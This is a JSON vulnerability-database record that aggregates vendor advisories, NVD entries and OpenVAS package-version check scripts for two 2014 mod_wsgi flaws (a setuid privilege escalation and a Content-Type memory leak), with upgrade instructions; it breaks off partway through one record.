{"published": "2014-12-13T00:00:00", "id": "GLSA-201412-21", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-09-06T19:47:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0240", "CVE-2014-0242"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310871194", "OPENVAS:702937", "OPENVAS:1361412562310123387", "OPENVAS:1361412562310881956", "OPENVAS:1361412562310867916", "OPENVAS:1361412562310120574", "OPENVAS:1361412562310702937", "OPENVAS:1361412562310867901", "OPENVAS:1361412562310841833", "OPENVAS:1361412562310121307"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-1091", "ELSA-2014-0788"]}, {"type": "nessus", "idList": ["UBUNTU_USN-2222-1.NASL", "CENTOS_RHSA-2014-0788.NASL", "FEDORA_2014-6938.NASL", "ALA_ALAS-2014-376.NASL", "MANDRIVA_MDVSA-2014-137.NASL", "FEDORA_2014-6944.NASL", "ORACLELINUX_ELSA-2014-0788.NASL", "REDHAT-RHSA-2014-0788.NASL", "DEBIAN_DSA-2937.NASL", "SL_20140625_MOD_WSGI_ON_SL6_X.NASL"]}, {"type": "amazon", "idList": ["ALAS-2014-376", "ALAS-2014-375"]}, {"type": "centos", "idList": ["CESA-2014:1091", "CESA-2014:0788"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30761", "SECURITYVULNS:VULN:13787"]}, {"type": "redhat", "idList": ["RHSA-2014:0788", "RHSA-2014:0789", "RHSA-2014:1091"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2937-1:00642"]}, {"type": "ubuntu", "idList": ["USN-2222-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:39196"]}], "modified": "2016-09-06T19:47:06", "rev": 2}, "vulnersScore": 6.1}, "description": "### Background\n\nmod_wsgi is an Apache2 module for running Python WSGI applications.\n\n### Description\n\nTwo vulnerabilities have been found in mod_wsgi:\n\n * Error codes returned by setuid are not properly handled (CVE-2014-0240) \n * A memory leak exists via the \u201cContent-Type\u201d header (CVE-2014-0242) \n\n### Impact\n\nA local attacker may be able to gain escalated privileges. Furthermore, a remote attacker may be able to obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll mod_wsgi users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apache/mod_wsgi-3.5\"", "type": "gentoo", "lastseen": "2016-09-06T19:47:06", "edition": 1, "title": "mod_wsgi: Privilege escalation", "href": "https://security.gentoo.org/glsa/201412-21", "modified": "2014-12-13T00:00:00", "bulletinFamily": "unix", "viewCount": 3, "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "affectedPackage": [{"packageFilename": "UNKNOWN", "packageName": "www-apache/mod_wsgi", "OS": "Gentoo", "packageVersion": "3.5", "OSVersion": "any", "operator": "lt", "arch": "all"}], "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0240", "https://bugs.gentoo.org/show_bug.cgi?id=510938", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0242"], "reporter": "Gentoo Foundation"}
{"cve": [{"lastseen": "2021-02-02T06:14:24", "description": "The mod_wsgi module before 3.5 for Apache, when daemon mode is enabled, does not properly handle error codes returned by setuid when run on certain Linux kernels, which allows local users to gain privileges via vectors related to the number of running processes.", "edition": 6, "cvss3": {}, "published": "2014-05-27T14:55:00", "title": "CVE-2014-0240", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0240"], "modified": "2017-12-21T02:29:00", "cpe": ["cpe:/a:modwsgi:mod_wsgi:3.4", "cpe:/a:modwsgi:mod_wsgi:2.3", "cpe:/a:modwsgi:mod_wsgi:1.0", "cpe:/a:modwsgi:mod_wsgi:1.3", "cpe:/a:modwsgi:mod_wsgi:3.3", "cpe:/a:modwsgi:mod_wsgi:1.5", "cpe:/a:modwsgi:mod_wsgi:2.2", "cpe:/a:modwsgi:mod_wsgi:2.1", "cpe:/a:modwsgi:mod_wsgi:3.2", "cpe:/a:modwsgi:mod_wsgi:1.6", "cpe:/a:modwsgi:mod_wsgi:2.6", "cpe:/a:modwsgi:mod_wsgi:3.0", "cpe:/a:modwsgi:mod_wsgi:2.7", "cpe:/a:modwsgi:mod_wsgi:1.1", "cpe:/a:modwsgi:mod_wsgi:1.2", "cpe:/a:modwsgi:mod_wsgi:2.5", "cpe:/a:modwsgi:mod_wsgi:2.0", "cpe:/a:modwsgi:mod_wsgi:1.4", "cpe:/a:modwsgi:mod_wsgi:2.8", "cpe:/a:modwsgi:mod_wsgi:3.1", "cpe:/a:modwsgi:mod_wsgi:2.4"], "id": "CVE-2014-0240", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0240", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:modwsgi:mod_wsgi:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:modwsgi:mod_wsgi:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:24", "description": "mod_wsgi module before 3.4 for Apache, when used in embedded mode, might allow remote attackers to obtain sensitive information via the Content-Type header which is generated from memory that may have been freed and then overwritten by a separate thread.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-12-09T20:15:00", "title": "CVE-2014-0242", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0242"], "modified": "2019-12-17T17:22:00", "cpe": [], "id": "CVE-2014-0242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0242", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "ubuntu": [{"lastseen": "2020-07-02T11:42:49", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "R\u00f3bert Kisteleki discovered mod_wsgi incorrectly checked setuid return \nvalues. A malicious application could use this issue to cause a local \nprivilege escalation when using daemon mode. (CVE-2014-0240)\n\nBuck Golemon discovered that mod_wsgi used memory that had been freed. \nA remote attacker could use this issue to read process memory via the \nContent-Type response header. This issue only affected Ubuntu 12.04 LTS. \n(CVE-2014-0242)", "edition": 5, "modified": "2014-05-26T00:00:00", "published": "2014-05-26T00:00:00", "id": "USN-2222-1", "href": "https://ubuntu.com/security/notices/USN-2222-1", "title": "mod_wsgi vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:29:22", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0788\n\n\nThe mod_wsgi adapter is an Apache module that provides a WSGI-compliant\ninterface for hosting Python-based web applications within Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the call to\nsetuid() failed. If mod_wsgi was set up to allow unprivileged users to run\nWSGI applications, a local user able to run a WSGI application could\npossibly use this flaw to escalate their privileges on the system.\n(CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for WSGI\napplications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different solution\nwith proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the \"Content-Type\" header. A remote attacker could possibly\nuse this flaw to disclose limited portions of the web application's memory.\n(CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these issues.\nUpstream acknowledges R\u00f3bert Kisteleki as the original reporter of\nCVE-2014-0240, and Buck Golemon as the original reporter of CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-June/032427.html\n\n**Affected packages:**\nmod_wsgi\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0788.html", "edition": 3, "modified": "2014-06-25T19:01:10", "published": "2014-06-25T19:01:10", "href": "http://lists.centos.org/pipermail/centos-announce/2014-June/032427.html", "id": "CESA-2014:0788", "title": "mod_wsgi security update", "type": "centos", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:28:05", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240"], "description": "**CentOS Errata and Security Advisory** CESA-2014:1091\n\n\nThe mod_wsgi adapter is an Apache module that provides a WSGI-compliant\ninterface for hosting Python-based web applications within Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the call to\nsetuid() failed. If mod_wsgi was set up to allow unprivileged users to run\nWSGI applications, a local user able to run a WSGI application could\npossibly use this flaw to escalate their privileges on the system.\n(CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for WSGI\napplications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different solution\nwith proper privilege separation.\n\nRed Hat would like to thank Graham Dumpleton for reporting this issue.\nUpstream acknowledges R\u00f3bert Kisteleki as the original reporter.\n\nAll mod_wsgi users are advised to upgrade to this updated package, which\ncontains a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-August/032544.html\n\n**Affected packages:**\nmod_wsgi\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1091.html", "edition": 3, "modified": "2014-08-25T12:17:55", "published": "2014-08-25T12:17:55", "href": "http://lists.centos.org/pipermail/centos-announce/2014-August/032544.html", "id": "CESA-2014:1091", "title": "mod_wsgi security update", "type": "centos", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:05", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "The mod_wsgi adapter is an Apache module that provides a WSGI-compliant\ninterface for hosting Python-based web applications within Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the call to\nsetuid() failed. If mod_wsgi was set up to allow unprivileged users to run\nWSGI applications, a local user able to run a WSGI application could\npossibly use this flaw to escalate their privileges on the system.\n(CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for WSGI\napplications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different solution\nwith proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the \"Content-Type\" header. A remote attacker could possibly\nuse this flaw to disclose limited portions of the web application's memory.\n(CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these issues.\nUpstream acknowledges R\u00f3bert Kisteleki as the original reporter of\nCVE-2014-0240, and Buck Golemon as the original reporter of CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\n", "modified": "2018-06-06T20:24:17", "published": "2014-06-25T04:00:00", "id": "RHSA-2014:0788", "href": "https://access.redhat.com/errata/RHSA-2014:0788", "type": "redhat", "title": "(RHSA-2014:0788) Important: mod_wsgi security update", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240"], "description": "The mod_wsgi adapter is an Apache module that provides a WSGI-compliant\ninterface for hosting Python-based web applications within Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the call to\nsetuid() failed. If mod_wsgi was set up to allow unprivileged users to run\nWSGI applications, a local user able to run a WSGI application could\npossibly use this flaw to escalate their privileges on the system.\n(CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for WSGI\napplications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different solution\nwith proper privilege separation.\n\nRed Hat would like to thank Graham Dumpleton for reporting this issue.\nUpstream acknowledges R\u00f3bert Kisteleki as the original reporter of this\nissue.\n\nAll python27-mod_wsgi and python33-mod_wsgi users are advised to upgrade to\nthese updated packages, which contain a backported patch to correct this\nissue.\n", "modified": "2018-06-13T01:28:25", "published": "2014-06-25T04:00:00", "id": "RHSA-2014:0789", "href": "https://access.redhat.com/errata/RHSA-2014:0789", "type": "redhat", "title": "(RHSA-2014:0789) Important: python27-mod_wsgi and python33-mod_wsgi security update", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240"], "description": "The mod_wsgi adapter is an Apache module that provides a WSGI-compliant\ninterface for hosting Python-based web applications within Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the call to\nsetuid() failed. If mod_wsgi was set up to allow unprivileged users to run\nWSGI applications, a local user able to run a WSGI application could\npossibly use this flaw to escalate their privileges on the system.\n(CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for WSGI\napplications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different solution\nwith proper privilege separation.\n\nRed Hat would like to thank Graham Dumpleton for reporting this issue.\nUpstream acknowledges R\u00f3bert Kisteleki as the original reporter.\n\nAll mod_wsgi users are advised to upgrade to this updated package, which\ncontains a backported patch to correct this issue.\n", "modified": "2018-04-12T03:32:24", "published": "2014-08-25T04:00:00", "id": "RHSA-2014:1091", "href": "https://access.redhat.com/errata/RHSA-2014:1091", "type": "redhat", "title": "(RHSA-2014:1091) Important: mod_wsgi security update", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "[3.2-6]\n- fix for CVE-2014-0242 (#1104685)\n[3.2-4]\n- fix for CVE-2014-0240 (#1104687)", "edition": 4, "modified": "2014-06-25T00:00:00", "published": "2014-06-25T00:00:00", "id": "ELSA-2014-0788", "href": "http://linux.oracle.com/errata/ELSA-2014-0788.html", "title": "mod_wsgi security update", "type": "oraclelinux", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T17:07:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240"], "description": "[3.4-12]\n- fix possible privilege escalation in setuid() (CVE-2014-0240)", "edition": 5, "modified": "2014-08-25T00:00:00", "published": "2014-08-25T00:00:00", "id": "ELSA-2014-1091", "href": "http://linux.oracle.com/errata/ELSA-2014-1091.html", "title": "mod_wsgi security update", "type": "oraclelinux", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:37:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-06-23T00:00:00", "id": "OPENVAS:1361412562310867901", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867901", "type": "openvas", "title": "Fedora Update for mod_wsgi FEDORA-2014-6938", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_wsgi FEDORA-2014-6938\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867901\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-23 10:33:17 +0530 (Mon, 23 Jun 2014)\");\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for mod_wsgi FEDORA-2014-6938\");\n script_tag(name:\"affected\", value:\"mod_wsgi on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-6938\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134459.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_wsgi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_wsgi\", rpm:\"mod_wsgi~3.5~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:01:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120577", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120577", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-376)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120577\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:29:57 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-376)\");\n script_tag(name:\"insight\", value:\"It was found that mod_wsgi did not properly drop privileges if the call to setuid() failed. If mod_wsgi was set up to allow unprivileged users to run WSGI applications, a local user able to run a WSGI application could possibly use this flaw to escalate their privileges on the system. Note: mod_wsgi is not intended to provide privilege separation for WSGI applications. Systems relying on mod_wsgi to limit or sandbox the privileges of mod_wsgi applications should migrate to a different solution with proper privilege separation.mod_wsgi allows you to host Python applications on the Apache HTTP Server. It was found that a remote attacker could leak portions of a mod_wsgi application's memory via the Content-Type header.\");\n script_tag(name:\"solution\", value:\"Run yum update mod_wsgi to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-376.html\");\n script_cve_id(\"CVE-2014-0242\", \"CVE-2014-0240\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"mod_wsgi-debuginfo\", rpm:\"mod_wsgi-debuginfo~3.2~6.8.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_wsgi\", rpm:\"mod_wsgi~3.2~6.8.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-01T00:00:00", "id": "OPENVAS:1361412562310881956", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881956", "type": "openvas", "title": "CentOS Update for mod_wsgi CESA-2014:0788 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for mod_wsgi CESA-2014:0788 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881956\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-01 19:50:47 +0530 (Tue, 01 Jul 2014)\");\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for mod_wsgi CESA-2014:0788 centos6\");\n\n script_tag(name:\"affected\", value:\"mod_wsgi on CentOS 6\");\n script_tag(name:\"insight\", value:\"The mod_wsgi adapter is an Apache module that provides a\nWSGI-compliant interface for hosting Python-based web applications within\nApache.\n\nIt was found that mod_wsgi did not properly drop privileges if the call to\nsetuid() failed. If mod_wsgi was set up to allow unprivileged users to run\nWSGI applications, a local user able to run a WSGI application could\npossibly use this flaw to escalate their privileges on the system.\n(CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for WSGI\napplications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different solution\nwith proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could possibly\nuse this flaw to disclose limited portions of the web application's memory.\n(CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these issues.\nUpstream acknowledges Robert Kisteleki as the original reporter of\nCVE-2014-0240, and Buck Golemon as the original reporter of CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0788\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-June/020389.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_wsgi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_wsgi\", rpm:\"mod_wsgi~3.2~6.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-07-01T00:00:00", "id": "OPENVAS:1361412562310871194", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871194", "type": 